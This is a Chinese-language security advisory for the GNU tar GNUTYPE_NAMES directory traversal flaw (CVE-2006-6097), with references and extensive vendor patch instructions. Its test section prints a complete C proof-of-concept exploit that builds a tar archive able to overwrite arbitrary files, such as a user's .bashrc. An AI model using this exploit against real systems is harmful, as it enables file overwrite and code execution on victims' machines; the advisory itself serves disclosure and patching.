首页 -> 安全研究
安全研究
安全漏洞
GNU Tar GNUTYPE_NAMES远程目录遍历漏洞
发布日期:2006-11-21
更新日期:2006-11-29
受影响系统:
GNU tar 1.16描述:
GNU tar 1.15.1
BUGTRAQ ID: 21235
CVE(CAN) ID: CVE-2006-6097
GNU tar可创建和解压tar文档,并进行各种存档文件管理。
GNU tar在处理特定的记录时未能正确处理可能的符号链接,远程攻击者可能利用此漏洞在用户机器的任意位置创建文件。
tar的extract.c文件中的extract_archive()函数和mangle.c文件中的extract_mangle()函数会处理包含有符号链接的GNUTYPE_NAMES记录类型。如果用户受骗打开了特制的tar文件的话,就会导致覆盖任意文件。
<*来源:Teemu Salmela (teemu.salmela@iki.fi)
链接:http://secunia.com/advisories/23115/
http://archives.neohapsis.com/archives/fulldisclosure/2006-11/0344.html
http://marc.theaimsgroup.com/?l=bugtraq&m=116474353115287&w=2
http://lwn.net/Alerts/215097
ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:26.gtar.asc
http://security.gentoo.org/glsa/glsa-200612-10.xml
http://www.debian.org/security/2006/dsa-1223
ftp://patches.sgi.com/support/free/security/advisories/20061202-01-P.asc
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
* tarxyz.c - GNU tar directory traversal exploit.
* Written by Teemu Salmela.
*
* Example usage (creates a tar file that extracts /home/teemu/.bashrc):
* $ gcc -o tarxyz tarxyz.c
* $ ./tarxyz > ~/xyz.tar
* $ mkdir -p /tmp/xyz/home/teemu/
* $ cp ~/newbashrc.txt /tmp/xyz/home/teemu/.bashrc
* $ cd /tmp
* $ tar -rf ~/xyz.tar xyz/home/teemu
*/
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
struct posix_header
{ /* byte offset */
char name[100]; /* 0 */
char mode[8]; /* 100 */
char uid[8]; /* 108 */
char gid[8]; /* 116 */
char size[12]; /* 124 */
char mtime[12]; /* 136 */
char chksum[8]; /* 148 */
char typeflag; /* 156 */
char linkname[100]; /* 157 */
char magic[6]; /* 257 */
char version[2]; /* 263 */
char uname[32]; /* 265 */
char gname[32]; /* 297 */
char devmajor[8]; /* 329 */
char devminor[8]; /* 337 */
char prefix[155]; /* 345 */
/* 500 */
};
#define GNUTYPE_NAMES 'N'
#define BLOCKSIZE 512
union block
{
char buffer[BLOCKSIZE];
struct posix_header header;
};
void
data(void *p, size_t size)
{
size_t n = 0;
char b[BLOCKSIZE];
while (size - n > 512) {
fwrite(&((char *)p)[n], 1, 512, stdout);
n += 512;
}
if (size - n) {
memset(b, 0, sizeof(b));
memcpy(b, &((char *)p)[n], size - n);
fwrite(b, 1, sizeof(b), stdout);
}
}
int
main(int argc, char *argv[])
{
char *link_name = "xyz";
union block b;
char *d;
int i;
unsigned int cksum;
if (argc > 1)
link_name = argv[1];
if (asprintf(&d, "Symlink / to %s\n", link_name) < 0) {
fprintf(stderr, "out of memory\n");
exit(1);
}
memset(&b, 0, sizeof(b));
strcpy(b.header.name, "xyz");
strcpy(b.header.mode, "0000777");
strcpy(b.header.uid, "0000000");
strcpy(b.header.gid, "0000000");
sprintf(b.header.size, "%011o", strlen(d));
strcpy(b.header.mtime, "00000000000");
strcpy(b.header.chksum, " ");
b.header.typeflag = GNUTYPE_NAMES;
strcpy(b.header.magic, "ustar ");
strcpy(b.header.uname, "root");
strcpy(b.header.gname, "root");
for (cksum = 0, i = 0; i < sizeof(b); i++)
cksum += b.buffer[i] & 0xff;
sprintf(b.header.chksum, "%06o ", cksum);
fwrite(&b, 1, sizeof(b), stdout);
data(d, strlen(d));
}
建议:
厂商补丁:
Debian
------
Debian已经为此发布了一个安全公告(DSA-1223-1)以及相应补丁:
DSA-1223-1:New tar packages fix arbitrary file overwrite
链接:http://www.debian.org/security/2006/dsa-1223
补丁下载:
Source archives:
http://security.debian.org/pool/updates/main/t/tar/tar_1.14.orig.tar.gz
Size/MD5 checksum: 1485633 3094544702b1affa32d969f0b6459663
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3.diff.gz
Size/MD5 checksum: 51004 d6513454cbe12eec5908c2b41253f843
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3.dsc
Size/MD5 checksum: 554 85503d4264d7b39c7969051c3661fa96
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_alpha.deb
Size/MD5 checksum: 520736 4b14a87c6e8b4dda327d802eddcf9af7
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_amd64.deb
Size/MD5 checksum: 503902 98a8169210eb273252a7997c726c4333
arm architecture (ARM)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_arm.deb
Size/MD5 checksum: 500266 49ef1817d4ee1753f66bd37be8f91455
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_hppa.deb
Size/MD5 checksum: 517810 5f48745a747ee36c330d97f3bc5cc980
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_i386.deb
Size/MD5 checksum: 499560 c764b0894f6c3317a78124177cfed9fe
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_ia64.deb
Size/MD5 checksum: 543432 0dc8b4d66a82d05d7b68f2dbee960791
m68k architecture (Motorola Mc680x0)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_m68k.deb
Size/MD5 checksum: 489058 381e468152e0a5a37113f412f13d85a7
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_mips.deb
Size/MD5 checksum: 520512 29bc4c6133bfeb259175fea45277a647
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_mipsel.deb
Size/MD5 checksum: 520258 ed3b0aadf8720c97a1df6334a90efe3c
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_powerpc.deb
Size/MD5 checksum: 506908 3a57a912dc159ee20d47ca1591a68619
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_s390.deb
Size/MD5 checksum: 511972 79cb92aaeee839c2d82efe743a8cea59
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/t/tar/tar_1.14-2.3_sparc.deb
Size/MD5 checksum: 499698 d260b9f5db00b12414d6136c63e37202
补丁安装方法:
1. 手工安装补丁包:
首先,使用下面的命令来下载补丁软件:
# wget url (url是补丁下载链接地址)
然后,使用下面的命令来安装补丁:
# dpkg -i file.deb (file是相应的补丁名)
2. 使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
# apt-get update
然后,使用下面的命令安装更新软件包:
# apt-get upgrade
FreeBSD
-------
FreeBSD已经为此发布了一个安全公告(FreeBSD-SA-06:26)以及相应补丁:
FreeBSD-SA-06:26:gtar name mangling symlink vulnerability
链接:ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-06:26.gtar.asc
补丁下载:
执行以下步骤之一:
1) 将有漏洞的系统升级到4-STABLE或5-STABLE,或修改日期之后的RELENG_5_5或RELENG_4_11安全版本。
2) 为当前系统打补丁:
以下补丁确认可应用于FreeBSD 4.11和5.5系统。
a) 从以下位置下载相关补丁,并使用PGP工具验证附带的PGP签名。
# fetch http://security.FreeBSD.org/patches/SA-06:26/gtar.patch
# fetch http://security.FreeBSD.org/patches/SA-06:26/gtar.patch.asc
b) 以root执行以下命令:
# cd /usr/src
# patch < /path/to/patch
# cd /usr/src/gnu/usr.bin/tar
# make obj && make depend && make && make install
GNU
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.gnu.org
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2006:0749-01)以及相应补丁:
RHSA-2006:0749-01:Moderate: tar security update
链接:http://lwn.net/Alerts/215097
SGI
---
SGI已经为此发布了一个安全公告(20061202-01-P)以及相应补丁:
20061202-01-P:SGI Advanced Linux Environment 3 Security Update #68
链接:ftp://patches.sgi.com/support/free/security/advisories/20061202-01-P.asc
Gentoo
------
Gentoo已经为此发布了一个安全公告(GLSA-200612-10)以及相应补丁:
GLSA-200612-10:Tar: Directory traversal vulnerability
链接:http://security.gentoo.org/glsa/glsa-200612-10.xml
所有Tar用户都应升级到最新版本:
# emerge --sync
# emerge --ask --oneshot --verbose ">=app-arch/tar-1.16-r2"
浏览次数:3893
严重程度:0(网友投票)
绿盟科技给您安全的保障